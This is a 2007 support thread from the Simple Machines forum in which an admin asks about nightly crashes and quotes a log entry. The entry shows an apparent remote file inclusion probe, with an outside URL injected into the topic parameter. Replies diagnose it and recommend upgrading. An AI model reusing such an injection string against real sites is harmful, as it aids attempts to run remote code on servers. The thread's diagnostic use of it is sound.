Simple Machines Community Forum

SMF Support => SMF 1.1.x Support => Aiheen aloitti: baxman - marraskuu 06, 2007, 02:26:45 IP

Otsikko: topic=http://rumusic.chat.ru/rumusic.wav -- smf hacker?
Kirjoitti: baxman - marraskuu 06, 2007, 02:26:45 IP
Our forum has been getting killed on several nights at 3am for having too many processes (often 50 or more).  This seems unusual since the traffic is primarily United States based.  After it is killed, it often has the data base corrupted, which must be fixed using cpanel data base repair.  In looking at the log file after the kill, there are hundreds of error messages like the following. 

Our thought is that maybe this is what is causing the problem with the large number of processes --  someone hacking into the forum?  We are on version 1.1.3 under cpanel fantastico.  Fantastico has not incorporated 1.1.4 yet, but we could attempt the patch and not wait for Fantastico update if we think that going to 1.1.4 will solve the problem. 

Any thoughts on what kind of problem we are having, and whether the security fixes in 1.1.4 will solve the problem?
Thanks in advance for any suggestions.

Guest  Today at 04:00:54 AM

http://xxxxxxxxx/forum/index.php?topic=http://rumusic.chat.ru/rumusic.wav?

: Can't open file: 'smf_sessions.MYI'. (errno: 145)
/home/xxxxxx/public_html/forum/Sources/Load.php
1986[/color]
Otsikko: Re: topic=http://rumusic.chat.ru/rumusic.wav -- smf hacker?
Kirjoitti: metallica48423 - marraskuu 06, 2007, 04:56:31 IP
cPanel hosting?  I'd be willing to bet around then it is doing logs/backups and things go down..  This is something to take up with your host.

You do not need to worry about this -- SMF is protected against this type of RFI attack -- click your link.  It goes to your boardindex. 
?action, ?topic, and ?board (among others) all are checked for the proper values and data type.
Otsikko: Re: topic=http://rumusic.chat.ru/rumusic.wav -- smf hacker?
Kirjoitti: 青山 素子 - marraskuu 06, 2007, 04:59:23 IP
Not sure why that URL would appear in a topic link, SMF only allows numeric ids for topics. I don't see things wrong with your site when I took a quick look. Where are you seeing this?

As for updating, it is strongly encouraged you upgrade to 1.1.4. There is a link to the update package in the main admin area, which should install nicely provided the package system isn't broken on your host. I wouldn't update through Fantastico anyway, it has this habit of breaking the software in the process.